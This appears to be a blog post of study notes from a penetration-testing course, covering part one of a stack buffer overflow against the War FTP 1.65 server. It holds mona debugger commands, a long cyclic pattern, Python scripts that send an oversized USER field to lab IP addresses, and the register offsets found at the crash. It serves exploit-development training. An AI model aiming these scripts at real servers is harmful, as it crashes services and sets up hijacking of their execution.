War FTP 1.65 Buffer Overflow Part 1

Source: Cybrary: Advanced Penetration Testing

  • Give the program too much input in the username (USER) field
  • Saved return pointer will be overwritten with our attack controlled input

Immunity Debugger

  • Go to File ->Attach -> war-ftpd

Setup Logging:

  • !mona config -set workingfolder C:\logs\%p

Identifying the Overwrite

  • !mona pattern_create 1100

===============================================================
  Output generated by mona.py v2.0, rev 566 – Immunity Debugger
===============================================================
  OS : xp, release 5.1.2600
  Process being debugged : war-ftpd (pid 4332)
  Current mona arguments: pattern_create 1100
===============================================================
===============================================================

Pattern of 1100 bytes :
———————–

ASCII:
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk

HEX:
\x41\x61\x30\x41\x61\x31\x41\x61\x32\x41\x61\x33\x41\x61\x34\x41\x61\x35\x41\x61\x36\x41\x61\x37\x41\x61\x38\x41\x61\x39\x41\x62\x30\x41\x62\x31\x41\x62\x32\x41\x62\x33\x41\x62\x34\x41\x62\x35\x41\x62\x36\x41\x62\x37\x41\x62\x38\x41\x62\x39\x41\x63\x30\x41\x63\x31\x41\x63\x32\x41\x63\x33\x41\x63\x34\x41\x63\x35\x41\x63\x36\x41\x63\x37\x41\x63\x38\x41\x63\x39\x41\x64\x30\x41\x64\x31\x41\x64\x32\x41\x64\x33\x41\x64\x34\x41\x64\x35\x41\x64\x36\x41\x64\x37\x41\x64\x38\x41\x64\x39\x41\x65\x30\x41\x65\x31\x41\x65\x32\x41\x65\x33\x41\x65\x34\x41\x65\x35\x41\x65\x36\x41\x65\x37\x41\x65\x38\x41\x65\x39\x41\x66\x30\x41\x66\x31\x41\x66\x32\x41\x66\x33\x41\x66\x34\x41\x66\x35\x41\x66\x36\x41\x66\x37\x41\x66\x38\x41\x66\x39\x41\x67\x30\x41\x67\x31\x41\x67\x32\x41\x67\x33\x41\x67\x34\x41\x67\x35\x41\x67\x36\x41\x67\x37\x41\x67\x38\x41\x67\x39\x41\x68\x30\x41\x68\x31\x41\x68\x32\x41\x68\x33\x41\x68\x34\x41\x68\x35\x41\x68\x36\x41\x68\x37\x41\x68\x38\x41\x68\x39\x41\x69\x30\x41\x69\x31\x41\x69\x32\x41\x69\x33\x41\x69\x34\x41\x69\x35\x41\x69\x36\x41\x69\x37\x41\x69\x38\x41\x69\x39\x41\x6a\x30\x41\x6a\x31\x41\x6a\x32\x41\x6a\x33\x41\x6a\x34\x41\x6a\x35\x41\x6a\x36\x41\x6a\x37\x41\x6a\x38\x41\x6a\x39\x41\x6b\x30\x41\x6b\x31\x41\x6b\x32\x41\x6b\x33\x41\x6b\x34\x41\x6b\x35\x41\x6b\x36\x41\x6b\x37\x41\x6b\x38\x41\x6b\x39\x41\x6c\x30\x41\x6c\x31\x41\x6c\x32\x41\x6c\x33\x41\x6c\x34\x41\x6c\x35\x41\x6c\x36\x41\x6c\x37\x41\x6c\x38\x41\x6c\x39\x41\x6d\x30\x41\x6d\x31\x41\x6d\x32\x41\x6d\x33\x41\x6d\x34\x41\x6d\x35\x41\x6d\x36\x41\x6d\x37\x41\x6d\x38\x41\x6d\x39\x41\x6e\x30\x41\x6e\x31\x41\x6e\x32\x41\x6e\x33\x41\x6e\x34\x41\x6e\x35\x41\x6e\x36\x41\x6e\x37\x41\x6e\x38\x41\x6e\x39\x41\x6f\x30\x41\x6f\x31\x41\x6f\x32\x41\x6f\x33\x41\x6f\x34\x41\x6f\x35\x41\x6f\x36\x41\x6f\x37\x41\x6f\x38\x41\x6f\x39\x41\x70\x30\x41\x70\x31\x41\x70\x32\x41\x70\x33\x41\x70\x34\x41\x70\x35\x41\x70\x36\x41\x70\x37\x41\x70\x38\x41\x70\x39\x41\x71\x30\x41\x71\x31\x41\x71\x32\x41\x71\x33\x41\x71\x34\x41\x71\x35\x41\x71\x36\x41\x71\x37\x41\x71\x38\x41\x71\x39\x41\x72\x30\x41\x72\x31\x41\x72\x32\x41\x72\x33\x41\x72\x34\x41\x72\x35\x41\x72\x36\x41\x72\x37\x41\x72\x38\x41\x72\x39\x41\x73\x30\x41\x73\x31\x41\x73\x32\x41\x73\x33\x41\x73\x34\x41\x73\x35\x41\x73\x36\x41\x73\x37\x41\x73\x38\x41\x73\x39\x41\x74\x30\x41\x74\x31\x41\x74\x32\x41\x74\x33\x41\x74\x34\x41\x74\x35\x41\x74\x36\x41\x74\x37\x41\x74\x38\x41\x74\x39\x41\x75\x30\x41\x75\x31\x41\x75\x32\x41\x75\x33\x41\x75\x34\x41\x75\x35\x41\x75\x36\x41\x75\x37\x41\x75\x38\x41\x75\x39\x41\x76\x30\x41\x76\x31\x41\x76\x32\x41\x76\x33\x41\x76\x34\x41\x76\x35\x41\x76\x36\x41\x76\x37\x41\x76\x38\x41\x76\x39\x41\x77\x30\x41\x77\x31\x41\x77\x32\x41\x77\x33\x41\x77\x34\x41\x77\x35\x41\x77\x36\x41\x77\x37\x41\x77\x38\x41\x77\x39\x41\x78\x30\x41\x78\x31\x41\x78\x32\x41\x78\x33\x41\x78\x34\x41\x78\x35\x41\x78\x36\x41\x78\x37\x41\x78\x38\x41\x78\x39\x41\x79\x30\x41\x79\x31\x41\x79\x32\x41\x79\x33\x41\x79\x34\x41\x79\x35\x41\x79\x36\x41\x79\x37\x41\x79\x38\x41\x79\x39\x41\x7a\x30\x41\x7a\x31\x41\x7a\x32\x41\x7a\x33\x41\x7a\x34\x41\x7a\x35\x41\x7a\x36\x41\x7a\x37\x41\x7a\x38\x41\x7a\x39\x42\x61\x30\x42\x61\x31\x42\x61\x32\x42\x61\x33\x42\x61\x34\x42\x61\x35\x42\x61\x36\x42\x61\x37\x42\x61\x38\x42\x61\x39\x42\x62\x30\x42\x62\x31\x42\x62\x32\x42\x62\x33\x42\x62\x34\x42\x62\x35\x42\x62\x36\x42\x62\x37\x42\x62\x38\x42\x62\x39\x42\x63\x30\x42\x63\x31\x42\x63\x32\x42\x63\x33\x42\x63\x34\x42\x63\x35\x42\x63\x36\x42\x63\x37\x42\x63\x38\x42\x63\x39\x42\x64\x30\x42\x64\x31\x42\x64\x32\x42\x64\x33\x42\x64\x34\x42\x64\x35\x42\x64\x36\x42\x64\x37\x42\x64\x38\x42\x64\x39\x42\x65\x30\x42\x65\x31\x42\x65\x32\x42\x65\x33\x42\x65\x34\x42\x65\x35\x42\x65\x36\x42\x65\x37\x42\x65\x38\x42\x65\x39\x42\x66\x30\x42\x66\x31\x42\x66\x32\x42\x66\x33\x42\x66\x34\x42\x66\x35\x42\x66\x36\x42\x66\x37\x42\x66\x38\x42\x66\x39\x42\x67\x30\x42\x67\x31\x42\x67\x32\x42\x67\x33\x42\x67\x34\x42\x67\x35\x42\x67\x36\x42\x67\x37\x42\x67\x38\x42\x67\x39\x42\x68\x30\x42\x68\x31\x42\x68\x32\x42\x68\x33\x42\x68\x34\x42\x68\x35\x42\x68\x36\x42\x68\x37\x42\x68\x38\x42\x68\x39\x42\x69\x30\x42\x69\x31\x42\x69\x32\x42\x69\x33\x42\x69\x34\x42\x69\x35\x42\x69\x36\x42\x69\x37\x42\x69\x38\x42\x69\x39\x42\x6a\x30\x42\x6a\x31\x42\x6a\x32\x42\x6a\x33\x42\x6a\x34\x42\x6a\x35\x42\x6a\x36\x42\x6a\x37\x42\x6a\x38\x42\x6a\x39\x42\x6b\x30\x42\x6b\x31\x42\x6b\x32\x42\x6b\x33\x42\x6b\x34\x42\x6b\x35\x42\x6b

JAVASCRIPT (unescape() friendly):
%u6141%u4130%u3161%u6141%u4132%u3361%u6141%u4134%u3561%u6141%u4136%u3761%u6141%u4138%u3961%u6241%u4130%u3162%u6241%u4132%u3362%u6241%u4134%u3562%u6241%u4136%u3762%u6241%u4138%u3962%u6341%u4130%u3163%u6341%u4132%u3363%u6341%u4134%u3563%u6341%u4136%u3763%u6341%u4138%u3963%u6441%u4130%u3164%u6441%u4132%u3364%u6441%u4134%u3564%u6441%u4136%u3764%u6441%u4138%u3964%u6541%u4130%u3165%u6541%u4132%u3365%u6541%u4134%u3565%u6541%u4136%u3765%u6541%u4138%u3965%u6641%u4130%u3166%u6641%u4132%u3366%u6641%u4134%u3566%u6641%u4136%u3766%u6641%u4138%u3966%u6741%u4130%u3167%u6741%u4132%u3367%u6741%u4134%u3567%u6741%u4136%u3767%u6741%u4138%u3967%u6841%u4130%u3168%u6841%u4132%u3368%u6841%u4134%u3568%u6841%u4136%u3768%u6841%u4138%u3968%u6941%u4130%u3169%u6941%u4132%u3369%u6941%u4134%u3569%u6941%u4136%u3769%u6941%u4138%u3969%u6a41%u4130%u316a%u6a41%u4132%u336a%u6a41%u4134%u356a%u6a41%u4136%u376a%u6a41%u4138%u396a%u6b41%u4130%u316b%u6b41%u4132%u336b%u6b41%u4134%u356b%u6b41%u4136%u376b%u6b41%u4138%u396b%u6c41%u4130%u316c%u6c41%u4132%u336c%u6c41%u4134%u356c%u6c41%u4136%u376c%u6c41%u4138%u396c%u6d41%u4130%u316d%u6d41%u4132%u336d%u6d41%u4134%u356d%u6d41%u4136%u376d%u6d41%u4138%u396d%u6e41%u4130%u316e%u6e41%u4132%u336e%u6e41%u4134%u356e%u6e41%u4136%u376e%u6e41%u4138%u396e%u6f41%u4130%u316f%u6f41%u4132%u336f%u6f41%u4134%u356f%u6f41%u4136%u376f%u6f41%u4138%u396f%u7041%u4130%u3170%u7041%u4132%u3370%u7041%u4134%u3570%u7041%u4136%u3770%u7041%u4138%u3970%u7141%u4130%u3171%u7141%u4132%u3371%u7141%u4134%u3571%u7141%u4136%u3771%u7141%u4138%u3971%u7241%u4130%u3172%u7241%u4132%u3372%u7241%u4134%u3572%u7241%u4136%u3772%u7241%u4138%u3972%u7341%u4130%u3173%u7341%u4132%u3373%u7341%u4134%u3573%u7341%u4136%u3773%u7341%u4138%u3973%u7441%u4130%u3174%u7441%u4132%u3374%u7441%u4134%u3574%u7441%u4136%u3774%u7441%u4138%u3974%u7541%u4130%u3175%u7541%u4132%u3375%u7541%u4134%u3575%u7541%u4136%u3775%u7541%u4138%u3975%u7641%u4130%u3176%u7641%u4132%u3376%u7641%u4134%u3576%u7641%u4136%u3776%u7641%u4138%u3976%u7741%u4130%u3177%u7741%u4132%u3377%u7741%u4134%u3577%u7741%u4136%u3777%u7741%u4138%u3977%u7841%u4130%u3178%u7841%u4132%u3378%u7841%u4134%u3578%u7841%u4136%u3778%u7841%u4138%u3978%u7941%u4130%u3179%u7941%u4132%u3379%u7941%u4134%u3579%u7941%u4136%u3779%u7941%u4138%u3979%u7a41%u4130%u317a%u7a41%u4132%u337a%u7a41%u4134%u357a%u7a41%u4136%u377a%u7a41%u4138%u397a%u6142%u4230%u3161%u6142%u4232%u3361%u6142%u4234%u3561%u6142%u4236%u3761%u6142%u4238%u3961%u6242%u4230%u3162%u6242%u4232%u3362%u6242%u4234%u3562%u6242%u4236%u3762%u6242%u4238%u3962%u6342%u4230%u3163%u6342%u4232%u3363%u6342%u4234%u3563%u6342%u4236%u3763%u6342%u4238%u3963%u6442%u4230%u3164%u6442%u4232%u3364%u6442%u4234%u3564%u6442%u4236%u3764%u6442%u4238%u3964%u6542%u4230%u3165%u6542%u4232%u3365%u6542%u4234%u3565%u6542%u4236%u3765%u6542%u4238%u3965%u6642%u4230%u3166%u6642%u4232%u3366%u6642%u4234%u3566%u6642%u4236%u3766%u6642%u4238%u3966%u6742%u4230%u3167%u6742%u4232%u3367%u6742%u4234%u3567%u6742%u4236%u3767%u6742%u4238%u3967%u6842%u4230%u3168%u6842%u4232%u3368%u6842%u4234%u3568%u6842%u4236%u3768%u6842%u4238%u3968%u6942%u4230%u3169%u6942%u4232%u3369%u6942%u4234%u3569%u6942%u4236%u3769%u6942%u4238%u3969%u6a42%u4230%u316a%u6a42%u4232%u336a%u6a42%u4234%u356a%u6a42%u4236%u376a%u6a42%u4238%u396a%u6b42%u4230%u316b%u6b42%u4232%u336b%u6b42%u4234%u356b%u6b42

Exploit:
#!/usr/bin/python
import socket
#buffer = “A” * 1100
buffer = “Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2 Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6A g7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak 3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5A n6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq 8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3A u4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax 6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0B b1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4B e5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi 0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk” s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect((‘10.0.0.58’,21))
response = s.recv(1024)
print response s.send(‘USER ‘ + buffer + ‘\r\n’)
response = s.recv(1024)
print response
s.send(‘PASS PASSWORD\r\n’)
s.close()

After the exploit hits War FTP -> !mona Findmsp
Use !mona findmsp to find all instances of part or all of the cyclic pattern in memory.

Finds if the pattern is in the registers (i.e. EIP) and the offset from the beginning of the pattern.

  • EIP contains normal pattern : 0x32714131 (offset 485)
  • ESP (0x00affd48) points at offset 493 in normal pattern (length 607)
  • EDI (0x00affe48) points at offset 749 in normal pattern (length 351)
  • EBP (0x00affda0) points at offset 581 in normal pattern (length 519)

Verifying Offsets
#!/usr/bin/python
import socket
buffer = “A” * 485 + “B” * 4 + “C” * 611
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect((‘192.168.20.10’,21))
response = s.recv(1024)
print response s.send(‘USER ‘ + buffer + ‘\r\n’)
response = s.recv(1024)
print response s.send(‘PASS PASSWORD\r\n’)
s.close()

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s